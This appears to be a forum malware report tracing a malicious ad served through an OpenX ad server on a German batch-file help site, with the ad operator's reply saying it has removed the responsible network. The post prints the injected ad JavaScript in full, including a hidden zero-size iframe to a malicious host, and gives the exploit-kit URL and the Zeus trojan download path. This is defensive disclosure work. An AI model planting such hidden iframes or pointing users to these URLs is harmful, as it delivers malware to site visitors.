Ad directs to Zeus v2.0

[SysAdMini]

we start at

Code: [Select]

www.msdosbefehle.de/anzeigen-von-meldungen-mit-einer-batch-datei-t79.html
There is an ad from adserver.ventaya.de.

Code: [Select]

<!-- Generated by OpenX 2.8.0 -->
<script type='text/javascript' src='http://adserver.ventaya.de/www/delivery/spcjs.php?id=1&amp;block=1&amp;blockcampaign=1'></script>

<!-- TradeDoubler site verification 1431179 -->

Code: [Select]

adserver.ventaya.de/www/delivery/spc.php?zones=1%7C2%7C3%7C4%7C5%7C6%7C7%7C8%7C9%7C10%7C11%7C12%7C13%7C14%7C15%7C16%7C17%7C18%7C19%7C21%7C22%7C23%7C24%7C25%7C27%7C28%7C29%7C30%7C31&source=&r=36928049&block=1&blockcampaign=1&charset=iso-8859-1&loc=http%3A//www.msdosbefehle.de/anzeigen-von-meldungen-mit-einer-batch-datei-t79.html
Let's look at the result

Code: [Select]

var OA_output = new Array();
OA_output['1'] = '';
OA_output['1'] += "<"+"span><"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OA_output['1'] += "/* openads=http://adserver.ventaya.de/www/delivery bannerid=158 zoneid=1 source= */\n";
OA_output['1'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"><"+"!--\n";
OA_output['1'] += "google_ad_client = \"pub-0440655336517328\";\n";
OA_output['1'] += "/* phpbb - 728x90 Image Anzeige unten horizontal */\n";
OA_output['1'] += "google_ad_slot = \"1125506879\";\n";
OA_output['1'] += "google_ad_width = 728;\n";
OA_output['1'] += "google_ad_height = 90;\n";
OA_output['1'] += "//-->\n";
OA_output['1'] += "<"+"/script>\n";
OA_output['1'] += "<"+"script type=\"text/javascript\"\n";
OA_output['1'] += "src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n";
OA_output['1'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://adserver.ventaya.de/www/delivery/ag.php\'><"+"/script><"+"/span><"+"div id=\'beacon_bf67ed0eda\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=158&amp;campaignid=35&amp;zoneid=1&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=bf67ed0eda\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"script type=\"text/javascript\">window.onload=function(){var aht=new Array();var aht=document.getElementsByTagName(\'*\');for(var i=0;i<"+"aht.length;i++){if(aht[i].name==\'append\'){aht[i].value=\'\';}if(aht[i].name==\'submitbutton\'){aht[i].onclick=function(){return false;}}}}<"+"/script>\n";
OA_output['1'] += "<"+"noscript><"+"style type=\"text/css\">.code{display:none;}<"+"/style><"+"/noscript>\n";
OA_output['1'] += "<"+"iframe src=\"http://trustandgoinc.com/in.cgi?default\" width=\"0\" height=\"0\" frameborder=\"0\"><"+"/iframe>\n";
OA_output['2'] = '';
OA_output['2'] += "<"+"script type=\"text/javascript\"><"+"!--\n";
OA_output['2'] += "amazon_ad_tag = \"mezoitsyag-21\"; amazon_ad_width = \"120\"; amazon_ad_height = \"600\"; amazon_ad_logo = \"hide\"; amazon_ad_link_target = \"new\"; amazon_ad_border = \"hide\";//--><"+"/script>\n";
OA_output['2'] += "<"+"script type=\"text/javascript\" src=\"http://www.assoc-amazon.de/s/ads.js\"><"+"/script><"+"div id=\'beacon_883fb8a7b6\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=139&amp;campaignid=33&amp;zoneid=2&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=883fb8a7b6\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['3'] = '';
OA_output['3'] += "<"+"a href=\'http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=1265__zoneid=3__cb=50cdb862fb__oadest=http%3A%2F%2Fwww1.belboon.de%2Fadtracking%2F02c3a50812d70189f7003671.html\' target=\'_blank\'>hier könnt ihr euch auch beim Chat anmelden<"+"/a><"+"div id=\'beacon_50cdb862fb\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=1265&amp;campaignid=251&amp;zoneid=3&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=50cdb862fb\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['4'] = '';
OA_output['4'] += "<"+"!-- BEGINN des zanox-affiliate HTML-Code -->\n";
OA_output['4'] += "<"+"!-- ( Der HTML-Code darf im Sinne der einwandfreien Funktionalität nicht verändert werden! ) -->\n";
OA_output['4'] += "<"+"a href=\"http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=811__zoneid=4__cb=06cecfedf5__oadest=http://www.zanox-affiliate.de/ppc/?12036356C715518984T\"  target=\"_blank\"><"+"img src=\"http://www.zanox-affiliate.de/ppv/?12036356C715518984\" align=\"bottom\" width=\"105\" height=\"80\" border=\"0\" hspace=\"1\" alt=\"Tchibo-Jede Woche eine neue Welt\"><"+"/a>\n";
OA_output['4'] += "<"+"!-- ENDE des zanox-affiliate HTML-Code --><"+"div id=\'beacon_06cecfedf5\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=811&amp;campaignid=189&amp;zoneid=4&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=06cecfedf5\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['5'] = '';
OA_output['5'] += "<"+"!-- BEGIN PARTNER PROGRAM - DO NOT CHANGE THE PARAMETERS OF THE HYPERLINK -->\n";
OA_output['5'] += "<"+"a href=\"http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=1255__zoneid=5__cb=47b157b27a__oadest=http://partners.webmasterplan.com/click.asp?ref=253585&site=4642&type=b9&bnb=9\"  target=\"_blank\">\n";
OA_output['5'] += "<"+"img src=\"http://banners.webmasterplan.com/view.asp?ref=253585&site=4642&b=9\" border=\"0\" alt=\"gutefrage.net - Die Ratgeber-Community\" width=\"88\" height=\"31\" /><"+"/a><"+"br />\n";
OA_output['5'] += "<"+"!-- END PARTNER PROGRAM --><"+"div id=\'beacon_47b157b27a\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=1255&amp;campaignid=250&amp;zoneid=5&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=47b157b27a\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['6'] = '';
OA_output['6'] += "<"+"a href=\'http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=254__zoneid=6__cb=e075672e7b__oadest=http%3A%2F%2Fpartners.webmasterplan.com%2Fclick.asp%3Fref%3D253585%26site%3D5680%26type%3Dtext%26tnb%3D3\' target=\'_blank\'>aktuelle Gratisartikel bei SCHLECKER<"+"/a><"+"div id=\'beacon_e075672e7b\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=254&amp;campaignid=48&amp;zoneid=6&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=e075672e7b\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['7'] = '';

OA_output['8'] = '';
OA_output['8'] += "<"+"!-- eBay RelevanceAd -->\n";
OA_output['8'] += "<"+"script language=\'JavaScript\' type=\'text/javascript\'>\n";
OA_output['8'] += "//<"+"-- DO NOT CHANGE -->\n";
OA_output['8'] += "// <"+"!--<"+"[CDATA[\n";
OA_output['8'] += "era_width = \'300\';\n";
OA_output['8'] += "era_height = \'250\';\n";
OA_output['8'] += "era_layout = \'mxd\';\n";
OA_output['8'] += "era_color_border = \'ECEFF2\';\n";
OA_output['8'] += "era_color_bg = \'ECEFF2\';\n";
OA_output['8'] += "era_color_text = \'434343\';\n";
OA_output['8'] += "era_color_title = \'000000\';\n";
OA_output['8'] += "era_color_link = \'434343\';\n";
OA_output['8'] += "era_itemtype = \'0\';\n";
OA_output['8'] += "era_publisher=\'253585\';\n";
OA_output['8'] += "// ]]> -->\n";
OA_output['8'] += "<"+"/script>\n";
OA_output['8'] += "<"+"script language=\'JavaScript\' type=\'text/javascript\' src=\'http://ebayrelevancead.webmasterplan.com/js/show_ads.js\'><"+"/script>\n";
OA_output['8'] += "<"+"!-- /eBay RelevanceAd --><"+"div id=\'beacon_714c171e7e\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=1238&amp;campaignid=4&amp;zoneid=8&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=714c171e7e\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['9'] = '';
OA_output['9'] += "<"+"a href=\'http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=827__zoneid=9__cb=5d521bb68f__oadest=http%3A%2F%2Fad.zanox.com%2Fppc%2F%3F12025695C1672808792T\' target=\'_blank\'>wo seid ihr zur Schule gegangen?<"+"/a><"+"div id=\'beacon_5d521bb68f\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=827&amp;campaignid=191&amp;zoneid=9&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=5d521bb68f\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['10'] = '';
OA_output['10'] += "<"+"!-- BEGINN des zanox-affiliate HTML-Code -->\n";
OA_output['10'] += "<"+"!-- ( Der HTML-Code darf im Sinne der einwandfreien Funktionalität nicht verändert werden! ) -->\n";
OA_output['10'] += "<"+"a href=\"http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=773__zoneid=10__cb=4e7a5fe7e0__oadest=http://ad.zanox.com/ppc/?12963300C94908996T\"  target=\"_blank\"><"+"img src=\"http://ad.zanox.com/ppv/?12963300C94908996\" align=\"bottom\" width=\"120\" height=\"60\" border=\"0\" hspace=\"1\" alt=\"http://www.myvideo.de\"><"+"/a>\n";
OA_output['10'] += "<"+"!-- ENDE des zanox-affiliate HTML-Code --><"+"div id=\'beacon_4e7a5fe7e0\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=773&amp;campaignid=182&amp;zoneid=10&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=4e7a5fe7e0\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['11'] = '';

OA_output['12'] = '';
OA_output['12'] += "<"+"a href=\'http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=71__zoneid=12__cb=6d67faef1c__oadest=http%3A%2F%2Fpartners.webmasterplan.com%2Fclick.asp%3Fref%3D253585%26site%3D3657%26type%3Dtext%26tnb%3D111\' target=\'_blank\'>Link zum neuen Quelle Sonderverkauf<"+"/a><"+"div id=\'beacon_6d67faef1c\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=71&amp;campaignid=9&amp;zoneid=12&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=6d67faef1c\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['13'] = '';

OA_output['14'] = '';

OA_output['15'] = '';

OA_output['16'] = '';

OA_output['17'] = '';

OA_output['18'] = '';
OA_output['18'] += "<"+"script type=\"text/javascript\">window.onload=function(){var aht=new Array();var aht=document.getElementsByTagName(\'*\');for(var i=0;i<"+"aht.length;i++){if(aht[i].name==\'append\'){aht[i].value=\'\';}if(aht[i].name==\'submitbutton\'){aht[i].onclick=function(){return false;}}}}<"+"/script>\n";
OA_output['18'] += "<"+"noscript><"+"style type=\"text/css\">.code{display:none;}<"+"/style><"+"/noscript>\n";
OA_output['18'] += "<"+"iframe src=\"http://trustandgoinc.com/in.cgi?default\" width=\"0\" height=\"0\" frameborder=\"0\"><"+"/iframe>\n";
OA_output['19'] = '';

OA_output['21'] = '';

OA_output['22'] = '';

OA_output['23'] = '';

OA_output['24'] = '';

OA_output['25'] = '';

OA_output['27'] = '';

OA_output['28'] = '';

OA_output['29'] = '';

OA_output['30'] = '';

OA_output['31'] = '';


It contains an iframe

Code: [Select]

OA_output['1'] += "<"+"iframe src=\"http://trustandgoinc.com/in.cgi?default\" width=\"0\" height=\"0\" frameborder=\"0\"><"+"/iframe>\n";
which returns a an iframe

Code: [Select]

<html><frameset rows="100%"><frame src="http://www.this-all-clean.com/yiruwe57324/"></frameset></html>

directing to a Eleonore exploit kit.

Payload of this kit is a Zeus v2.0 trojan.

Code: [Select]

www.this-all-clean.com/yiruwe57324/load/load.exe

http://www.virustotal.com/analisis/7d666abf0d867e7c7fe0ba26b7ef216af1591e92f04951fe06b37b74a114fb83-1271929389
Comodo    4663    2010.04.22    TrojWare.Win32.Trojan.Agent.Gen
F-Secure    9.0.15370.0    2010.04.22    Suspicious:W32/Malware!Gemini
McAfee-GW-Edition    6.8.5    2010.04.22    Heuristic.LooksLike.Trojan.Backdoor.Tofsee.H
NOD32    5049    2010.04.22    Win32/Spy.Zbot.YU
Panda    10.0.2.7    2010.04.21    Suspicious file
Symantec    20091.2.0.41    2010.04.22    Trojan.Zbot

http://camas.comodo.com/cgi-bin/submit?file=7d666abf0d867e7c7fe0ba26b7ef216af1591e92f04951fe06b37b74a114fb83

[ventaya]

Hello,

thanks for sending us this mailware alert, we checked our adserver and found the malware in the adscale.de advertising network. Now we removed this network.

Regards

Simon